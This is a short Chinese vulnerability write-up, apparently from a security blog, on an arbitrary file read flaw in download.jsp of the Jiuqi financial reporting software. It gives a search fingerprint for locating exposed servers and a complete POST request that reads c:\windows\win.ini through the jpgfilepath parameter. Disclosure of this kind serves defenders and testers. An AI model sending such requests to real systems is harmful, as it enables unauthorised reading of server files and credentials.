Jiuqi财务报表 download.jsp 任意文件读取漏洞

# Jiuqi财务报表 download.jsp 任意文件读取漏洞 ## 漏洞描述 Jiuqi财务报表 download.jsp 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的信息 ## 漏洞影响 Jiuqi财务报...

Jiuqi财务报表 download.jsp 任意文件读取漏洞

漏洞描述

Jiuqi财务报表 download.jsp 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的信息

漏洞影响

Jiuqi财务报表

网络测绘

body="/netrep/"

漏洞复现

登录路径如下

img

发送请求包

POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host: 
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

jpgfilepath=c:\windows\win.ini

image-20220321114620970

  • 发表于 2024-07-12 18:46:17
  • 阅读 ( 1552 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计